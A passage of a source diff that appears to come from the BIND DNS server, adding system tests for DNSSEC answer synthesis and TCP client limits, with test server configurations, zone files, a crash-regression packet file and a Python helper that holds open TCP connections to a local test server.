2 ] && nodata=dig.out.ns${ns}.test$n + n=$((n+1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + echo_i "prime wildcard response (synth-from-dnssec ${description};) ($n)" + ret=0 + dig_with_opts a.wild-a.example. @10.53.0.${ns} a > dig.out.ns${ns}.test$n || ret=1 + grep "flags:[^;]* ad[ ;]" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "status: NOERROR," dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "a.wild-a.example.*3600.IN.A" dig.out.ns${ns}.test$n > /dev/null || ret=1 + n=$((n+1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + echo_i "prime wildcard CNAME response (synth-from-dnssec ${description};) ($n)" + ret=0 + dig_with_opts a.wild-cname.example. @10.53.0.${ns} a > dig.out.ns${ns}.test$n || ret=1 + grep "flags:[^;]* ad[ ;]" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "status: NOERROR," dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "a.wild-cname.example.*3600.IN.CNAME" dig.out.ns${ns}.test$n > /dev/null || ret=1 + n=$((n+1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +done + +echo_i "prime redirect response (+nodnssec) (synth-from-dnssec <default>;) ($n)" +ret=0 +dig_with_opts +nodnssec a.redirect. @10.53.0.3 a > dig.out.ns2.test$n || ret=1 +grep "flags:[^;]* ad[ ;]" dig.out.ns2.test$n > /dev/null && ret=1 +grep "status: NOERROR," dig.out.ns2.test$n > /dev/null || ret=1 +grep 'a\.redirect\..*300.IN.A.100\.100\.100\.2' dig.out.ns2.test$n > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# +# ensure TTL of synthesised answers differs from direct answers. +# +sleep 1 + +for ns in 2 4 5 +do + case $ns in + 2) synth=no description="<default>";; + 4) synth=no description="no";; + 5) synth=yes description="yes";; + *) exit 1;; + esac + echo_i "check synthesized NXDOMAIN response (synth-from-dnssec ${description};) ($n)" + ret=0 + dig_with_opts b.example. @10.53.0.${ns} a > dig.out.ns${ns}.test$n || ret=1 + grep "flags:[^;]* ad[ ;]" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "status: NXDOMAIN," dig.out.ns${ns}.test$n > /dev/null || ret=1 + if [ ${synth} = yes ] + then + grep "example.*IN.SOA" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "example.*3600.IN.SOA" dig.out.ns${ns}.test$n > /dev/null && ret=1 + else + grep "example.*3600.IN.SOA" dig.out.ns${ns}.test$n > /dev/null || ret=1 + fi + digcomp $nxdomain dig.out.ns${ns}.test$n || ret=1 + n=$((n+1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + echo_i "check synthesized NODATA response (synth-from-dnssec ${description};) ($n)" + ret=0 + dig_with_opts nodata.example. @10.53.0.${ns} aaaa > dig.out.ns${ns}.test$n || ret=1 + grep "flags:[^;]* ad[ ;]" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "status: NOERROR," dig.out.ns${ns}.test$n > /dev/null || ret=1 + if [ ${synth} = yes ] + then + grep "example.*IN.SOA" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "example.*3600.IN.SOA" dig.out.ns${ns}.test$n > /dev/null && ret=1 + else + grep "example.*3600.IN.SOA" dig.out.ns${ns}.test$n > /dev/null || ret=1 + fi + digcomp $nodata dig.out.ns${ns}.test$n || ret=1 + n=$((n+1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + echo_i "check synthesized wildcard response (synth-from-dnssec ${description};) ($n)" + ret=0 + dig_with_opts b.wild-a.example. @10.53.0.${ns} a > dig.out.ns${ns}.test$n || ret=1 + grep "flags:[^;]* ad[ ;]" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "status: NOERROR," dig.out.ns${ns}.test$n > /dev/null || ret=1 + if [ ${synth} = yes ] + then + grep "b\.wild-a\.example\..*IN.A" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "b\.wild-a\.example\..*3600.IN.A" dig.out.ns${ns}.test$n > /dev/null && ret=1 + else + grep "b\.wild-a\.example\..*3600.IN.A" dig.out.ns${ns}.test$n > /dev/null || ret=1 + fi + n=$((n+1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) + + echo_i "check synthesized wildcard CNAME response (synth-from-dnssec ${description};) ($n)" + ret=0 + dig_with_opts b.wild-cname.example. @10.53.0.${ns} a > dig.out.ns${ns}.test$n || ret=1 + grep "flags:[^;]* ad[ ;]" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "status: NOERROR," dig.out.ns${ns}.test$n > /dev/null || ret=1 + if [ ${synth} = yes ] + then + grep "b.wild-cname.example.*IN.CNAME" dig.out.ns${ns}.test$n > /dev/null || ret=1 + grep "b.wild-cname.example.*3600.IN.CNAME" dig.out.ns${ns}.test$n > /dev/null && ret=1 + else + grep "b.wild-cname.example.*3600.IN.CNAME" dig.out.ns${ns}.test$n > /dev/null || ret=1 + fi + grep "ns1.example.*.IN.A" dig.out.ns${ns}.test$n > /dev/null || ret=1 + n=$((n+1)) + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +done + +echo_i "check redirect response (+dnssec) (synth-from-dnssec <default>;) ($n)" +ret=0 +dig_with_opts b.redirect. @10.53.0.3 a > dig.out.ns2.test$n || ret=1 +grep "flags:[^;]* ad[ ;]" dig.out.ns2.test$n > /dev/null || ret=1 +grep "status: NXDOMAIN," dig.out.ns2.test$n > /dev/null || ret=1 +grep "\..*3600.IN.SOA" dig.out.ns2.test$n > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "check redirect response (+nodnssec) (synth-from-dnssec <default>;) ($n)" +ret=0 +dig_with_opts +nodnssec b.redirect. @10.53.0.3 a > dig.out.ns2.test$n || ret=1 +grep "flags:[^;]* ad[ ;]" dig.out.ns2.test$n > /dev/null && ret=1 +grep "status: NOERROR," dig.out.ns2.test$n > /dev/null || ret=1 +grep 'b\.redirect\..*300.IN.A.100\.100\.100\.2' dig.out.ns2.test$n > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + + +echo_i "check DNAME handling (synth-from-dnssec yes;) ($n)" +ret=0 +dig_with_opts dnamed.example. ns @10.53.0.5 > dig.out.ns5.test$n || ret=1 +dig_with_opts a.dnamed.example. a @10.53.0.5 > dig.out.ns5-1.test$n || ret=1 +grep "status: NOERROR," dig.out.ns5-1.test$n > /dev/null || ret=1 +n=$((n+1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/system-test-driver.sh b/bin/tests/system/system-test-driver.sh new file mode 100755 index 0000000..cf4d5f2 --- /dev/null +++ b/bin/tests/system/system-test-driver.sh @@ -0,0 +1,80 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck disable=SC2181 +# shellcheck disable=SC2034 + +usage() { + echo "$0 --test-name=NAME --log-file=PATH.log --trs-file=PATH.trs --color-tests={yes|no} --expect-failure={yes|no} --enable-hard-errors={yes|no}" +} + +# +# This requires GNU getopt +# +getopt --test >/dev/null +if [ "$?" -ne 4 ]; then + echo "fatal: GNU getopt is required" + exit 1 +fi + +OPTS=$(getopt --shell "sh" --name "$(basename "$0")" --options '' --longoptions test-name:,log-file:,trs-file:,color-tests:,expect-failure:,enable-hard-errors: -- "$@") + +if [ "$?" != 0 ] ; then echo "Failed parsing options." >&2 ; exit 1 ; fi + +eval set -- "$OPTS" + +TEST_NAME= +LOG_FILE= +TRS_FILE= +COLOR_TESTS=yes +EXPECT_FAILURE=no +HARD_ERRORS=yes + +while true; do + case "$1" in + --test-name ) TEST_NAME="$2"; shift; shift ;; + --log-file ) LOG_FILE="$2"; shift; shift ;; + --trs-file ) TRS_FILE="$2"; shift; shift ;; + --color-tests ) COLOR_TESTS="$2"; shift; shift ;; + --expect-failure ) EXPECT_FAILURE="$2"; shift; shift ;; + --hard-errors ) HARD_ERRORS="$2"; shift; shift ;; + -- ) shift; break ;; + *) break ;; + esac +done + +if [ -z "$1" ]; then + echo "fatal: test name required" + usage + exit 1 +fi + +TEST_PROGRAM="$1" +shift + +if [ -z "$TEST_NAME" ]; then + TEST_NAME="$(basename "$TEST_PROGRAM")" +fi +if [ -z "$LOG_FILE" ]; then + LOG_FILE="$TEST_PROGRAM.log" +fi +if [ -z "$TRS_FILE" ]; then + TRS_FILE="$TEST_PROGRAM.trs" +fi + +echo "Running $TEST_PROGRAM" + +random=$(awk 'BEGIN { srand(); print int(rand()*32768) }' /dev/null) +./run.sh -p "$((random%32000+32000))" "$@" "$TEST_PROGRAM" + +exit $? diff --git a/bin/tests/system/tcp/1996-alloc_dnsbuf-crash-test.pkt b/bin/tests/system/tcp/1996-alloc_dnsbuf-crash-test.pkt new file mode 100644 index 0000000..7520c3a --- /dev/null +++ b/bin/tests/system/tcp/1996-alloc_dnsbuf-crash-test.pkt @@ -0,0 +1,12 @@ +# Transaction ID +0001 +# Standard query +0000 +# Questions: 1, Additional: 1 +0001 0000 0000 0000 +# QNAME: www.isc.org +03 697363 03 6F7267 00 +# Type: AXFR +00fc +# Class: IN +0001 diff --git a/bin/tests/system/tcp/ans6/ans.py b/bin/tests/system/tcp/ans6/ans.py new file mode 100644 index 0000000..4595ddc --- /dev/null +++ b/bin/tests/system/tcp/ans6/ans.py @@ -0,0 +1,157 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +############################################################################ +# +# This tool allows an arbitrary number of TCP connections to be made to the +# specified service and to keep them open until told otherwise. It is +# controlled by writing text commands to a TCP socket (default port: 5309). +# +# Currently supported commands: +# +# - open <COUNT> <HOST> <PORT> +# +# Opens <COUNT> TCP connections to <HOST>:<PORT> and keeps them open. +# <HOST> must be an IP address (IPv4 or IPv6). +# +# - close <COUNT> +# +# Close the oldest <COUNT> previously established connections. +# +############################################################################ + +from __future__ import print_function + +import datetime +import errno +import os +import select +import signal +import socket +import sys +import time + + +# Timeout for establishing all connections requested by a single 'open' command. +OPEN_TIMEOUT = 2 +VERSION_QUERY = b"\x00\x1e\xaf\xb8\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x07version\x04bind\x00\x00\x10\x00\x03" + + +def log(msg): + print(datetime.datetime.now().strftime("%d-%b-%Y %H:%M:%S.%f ") + msg) + + +def open_connections(active_conns, count, host, port): + queued = [] + errors = [] + + try: + socket.inet_aton(host) + family = socket.AF_INET + except socket.error: + family = socket.AF_INET6 + + log("Opening %d connections..." % count) + + for _ in range(count): + sock = socket.socket(family, socket.SOCK_STREAM) + sock.setblocking(0) + err = sock.connect_ex((host, port)) + if err not in (0, errno.EINPROGRESS): + log("%s on connect for socket %s" % (errno.errorcode[err], sock)) + errors.append(sock) + else: + queued.append(sock) + + start = time.time() + while queued: + now = time.time() + time_left = OPEN_TIMEOUT - (now - start) + if time_left <= 0: + break + _, wsocks, _ = select.select([], queued, [], time_left) + for sock in wsocks: + queued.remove(sock) + err = sock.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) + if err: + log("%s for socket %s" % (errno.errorcode[err], sock)) + errors.append(sock) + else: + sock.send(VERSION_QUERY) + active_conns.append(sock) + + if errors: + log("result=FAIL: %d connection(s) failed" % len(errors)) + elif queued: + log("result=FAIL: Timed out, aborting %d pending connections" % len(queued)) + for sock in queued: + sock.close() + else: + log("result=OK: Successfully opened %d connections" % count) + + +def close_connections(active_conns, count): + log("Closing %s connections..." % "all" if count == 0 else str(count)) + if count == 0: + count = len(active_conns) + for _ in range(count): + sock = active_conns.pop(0) + sock.close() + log("result=OK: Successfully closed %d connections" % count) + + +def sigterm(*_): + log("SIGTERM received, shutting down") + os.remove("ans.pid") + sys.exit(0) + + +def main(): + active_conns = [] + + signal.signal(signal.SIGTERM, sigterm) + + with open("ans.pid", "w") as pidfile: + print(os.getpid(), file=pidfile) + + listenip = "10.53.0.6" + try: + port = int(os.environ["CONTROLPORT"]) + except KeyError: + port = 5309 + + log("Listening on %s:%d" % (listenip, port)) + + ctlsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ctlsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + ctlsock.bind((listenip, port)) + ctlsock.listen(1) + + while True: + (clientsock, _) = ctlsock.accept() + log("Accepted control connection from %s" % clientsock) + cmdline = clientsock.recv(512).decode("ascii").strip() + if cmdline: + log("Received command: %s" % cmdline) + cmd = cmdline.split() + if cmd[0] == "open": + count, host, port = cmd[1:] + open_connections(active_conns, int(count), host, int(port)) + elif cmd[0] == "close": + (count,) = cmd[1:] + close_connections(active_conns, int(count)) + else: + log("result=FAIL: Unknown command") + clientsock.close() + + +if __name__ == "__main__": + main() diff --git a/bin/tests/system/tcp/clean.sh b/bin/tests/system/tcp/clean.sh new file mode 100644 index 0000000..ae4cb25 --- /dev/null +++ b/bin/tests/system/tcp/clean.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ans6/ans.run* +rm -f dig.out* +rm -f rndc.out* +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* +rm -f ns*/named.memstats +rm -f ns*/named.run +rm -f ns*/named.conf +rm -f ns*/named.stats* diff --git a/bin/tests/system/tcp/ns1/named.conf.in b/bin/tests/system/tcp/ns1/named.conf.in new file mode 100644 index 0000000..24c8746 --- /dev/null +++ b/bin/tests/system/tcp/ns1/named.conf.in @@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + statistics-file "named.stats"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/tcp/ns1/root.db b/bin/tests/system/tcp/ns1/root.db new file mode 100644 index 0000000..17780d1 --- /dev/null +++ b/bin/tests/system/tcp/ns1/root.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns2.example. +ns2.example. A 10.53.0.2 diff --git a/bin/tests/system/tcp/ns2/example.db b/bin/tests/system/tcp/ns2/example.db new file mode 100644 index 0000000..4d60ce3 --- /dev/null +++ b/bin/tests/system/tcp/ns2/example.db @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns2.example. +ns2.example. A 10.53.0.2 + +$ORIGIN example. +a A 10.0.0.1 + MX 10 mail.example. + +mail A 10.0.0.2 diff --git a/bin/tests/system/tcp/ns2/named.conf.in b/bin/tests/system/tcp/ns2/named.conf.in new file mode 100644 index 0000000..5737800 --- /dev/null +++ b/bin/tests/system/tcp/ns2/named.conf.in @@ -0,0 +1,46 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + statistics-file "named.stats"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; + allow-update { any; }; +}; diff --git a/bin/tests/system/tcp/ns3/named.conf.in b/bin/tests/system/tcp/ns3/named.conf.in new file mode 100644 index 0000000..5b3b982 --- /dev/null +++ b/bin/tests/system/tcp/ns3/named.conf.in @@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + directory "."; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; +}; + +server 10.53.0.1 { tcp-only yes; }; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/tcp/ns4/named.conf.in b/bin/tests/system/tcp/ns4/named.conf.in new file mode 100644 index 0000000..a7a0546 --- /dev/null +++ b/bin/tests/system/tcp/ns4/named.conf.in @@ -0,0 +1,43 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + directory "."; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + forwarders { 10.53.0.2; }; + forward only; +}; + +server 10.53.0.2 { tcp-only yes; }; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/tcp/ns5/named.conf.in b/bin/tests/system/tcp/ns5/named.conf.in new file mode 100644 index 0000000..7827d9d --- /dev/null +++ b/bin/tests/system/tcp/ns5/named.conf.in @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS5 + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + directory "."; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + tcp-listen-queue 32; + recursion yes; + notify yes; + tcp-clients 17; + dnssec-validation no; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/tcp/ns7/named.conf.in b/bin/tests/system/tcp/ns7/named.conf.in new file mode 100644 index 0000000..bf434d9 --- /dev/null +++ b/bin/tests/system/tcp/ns7/named.conf.in @@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.7; + notify-source 10.53.0.7; + transfer-source 10.53.0.7; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.7; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + statistics-file "named.stats"; + tcp-clients 1; + keep-response-order { any; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/tcp/ns7/named.dropedns b/bin/tests/system/tcp/ns7/named.dropedns new file mode 100644 index 0000000..37dd9cf --- /dev/null +++ b/bin/tests/system/tcp/ns7/named.dropedns @@ -0,0 +1 @@ +dropedns diff --git a/bin/tests/system/tcp/ns7/root.db b/bin/tests/system/tcp/ns7/root.db new file mode 100644 index 0000000..bb31741 --- /dev/null +++ b/bin/tests/system/tcp/ns7/root.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.7 + +example. NS ns2.example. +ns2.example. A 10.53.0.2 diff --git a/bin/tests/system/tcp/prereq.sh b/bin/tests/system/tcp/prereq.sh new file mode 100644 index 0000000..51e8c66 --- /dev/null +++ b/bin/tests/system/tcp/prereq.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if ! test -n "$PYTHON"; then + echo_i "This test requires Python." + exit 1 +fi + diff --git a/bin/tests/system/tcp/setup.sh b/bin/tests/system/tcp/setup.sh new file mode 100644 index 0000000..70aee8c --- /dev/null +++ b/bin/tests/system/tcp/setup.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf +copy_setports ns7/named.conf.in ns7/named.conf diff --git a/bin/tests/system/tcp/tests.sh b/bin/tests/system/tcp/tests.sh new file mode 100644 index 0000000..a24a199 --- /dev/null +++ b/bin/tests/system/tcp/tests.sh @@ -0,0 +1,204 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +SYSTEMTESTTOP=.. +# shellcheck source=../conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +dig_with_opts() { + "${DIG}" -p "${PORT}" "$@" +} + +rndccmd() { + "${RNDC}" -p "${CONTROLPORT}" -c ../common/rndc.conf -s "$@" +} + +status=0 +n=0 + +n=$((n + 1)) +echo_i "initializing TCP statistics ($n)" +ret=0 +rndccmd 10.53.0.1 stats || ret=1 +rndccmd 10.53.0.2 stats || ret=1 +mv ns1/named.stats ns1/named.stats.test$n +mv ns2/named.stats ns2/named.stats.test$n +ntcp10="$(grep "TCP requests received" ns1/named.stats.test$n | tail -1 | awk '{print $1}')" +ntcp20="$(grep "TCP requests received" ns2/named.stats.test$n | tail -1 | awk '{print $1}')" +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking TCP request statistics (resolver) ($n)" +ret=0 +dig_with_opts @10.53.0.3 txt.example. > dig.out.test$n +sleep 1 +rndccmd 10.53.0.1 stats || ret=1 +rndccmd 10.53.0.2 stats || ret=1 +mv ns1/named.stats ns1/named.stats.test$n +mv ns2/named.stats ns2/named.stats.test$n +ntcp11="$(grep "TCP requests received" ns1/named.stats.test$n | tail -1 | awk '{print $1}')" +ntcp21="$(grep "TCP requests received" ns2/named.stats.test$n | tail -1 | awk '{print $1}')" +if [ "$ntcp10" -ge "$ntcp11" ]; then ret=1; fi +if [ "$ntcp20" -ne "$ntcp21" ]; then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking TCP request statistics (forwarder) ($n)" +ret=0 +dig_with_opts @10.53.0.4 txt.example. > dig.out.test$n +sleep 1 +rndccmd 10.53.0.1 stats || ret=1 +rndccmd 10.53.0.2 stats || ret=1 +mv ns1/named.stats ns1/named.stats.test$n +mv ns2/named.stats ns2/named.stats.test$n +ntcp12="$(grep "TCP requests received" ns1/named.stats.test$n | tail -1 | awk '{print $1}')" +ntcp22="$(grep "TCP requests received" ns2/named.stats.test$n | tail -1 | awk '{print $1}')" +if [ "$ntcp11" -ne "$ntcp12" ]; then ret=1; fi +if [ "$ntcp21" -ge "$ntcp22" ];then ret=1; fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# -------- TCP high-water tests ---------- +refresh_tcp_stats() { + rndccmd 10.53.0.5 status > rndc.out.$n || ret=1 + TCP_CUR="$(sed -n "s/^tcp clients: \([0-9][0-9]*\).*/\1/p" rndc.out.$n)" + TCP_LIMIT="$(sed -n "s/^tcp clients: .*\/\([0-9][0-9]*\)/\1/p" rndc.out.$n)" + TCP_HIGH="$(sed -n "s/^TCP high-water: \([0-9][0-9]*\)/\1/p" rndc.out.$n)" +} + +# Send a command to the tool script listening on 10.53.0.6. +send_command() { + nextpart ans6/ans.run > /dev/null + echo "$*" | "${PERL}" "${SYSTEMTESTTOP}/send.pl" 10.53.0.6 "${CONTROLPORT}" + wait_for_log_peek 10 "result=" ans6/ans.run || ret=1 + if ! nextpartpeek ans6/ans.run | grep -qF "result=OK"; then + return 1 + fi +} + +# Instructs ans6 to open $1 TCP connections to 10.53.0.5. +open_connections() { + send_command "open" "${1}" 10.53.0.5 "${PORT}" || return 1 +} + +# Instructs ans6 to close $1 TCP connections to 10.53.0.5. +close_connections() 